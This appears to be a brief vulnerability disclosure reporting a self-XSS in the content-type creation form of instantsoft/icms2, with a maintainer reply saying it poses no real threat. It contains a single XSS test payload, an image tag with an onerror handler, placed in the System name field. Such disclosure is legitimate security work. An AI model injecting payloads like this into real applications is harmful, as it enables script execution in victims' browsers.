Self XSS in "Content Types / Add Content Type" in instantsoft/icms2
Reported on
Aug 8th 2023
Description
Add payload to field System name:
<img src=x onerror=alert(window.origin)>
Proof of Concept
https://drive.google.com/file/d/1xJ24a3HveP4d_pKXF5zmtsNIa2-wweoA/view?usp=sharing
Impact
An attacker could perform unauthorized actions in the context of the victim's browser.
It does not provide a threat. But thanks anyway, we'll fix it!